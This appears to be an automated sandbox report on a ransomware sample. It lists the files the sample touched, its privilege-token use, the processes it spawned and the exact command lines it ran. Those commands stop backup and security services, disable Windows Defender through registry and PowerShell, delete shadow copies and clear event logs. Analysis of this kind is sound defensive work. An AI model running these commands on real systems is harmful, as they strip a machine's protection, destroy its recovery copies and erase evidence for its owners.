File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_1dQCooE08es0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 656 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1640 wrote to memory of 1020 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1148 wrote to memory of 1804 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1952 wrote to memory of 308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 824 wrote to memory of 1056 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 660 wrote to memory of 1172 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1112 wrote to memory of 1664 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe C:\Windows\SysWOW64\net.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 992 wrote to memory of 988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 136df8aa392c6a628beedcf3fa5b77ef
SHA1 b1358967b392b0066c22811f77833433e71da1ac
SHA256 2704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f
SHA512 44d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9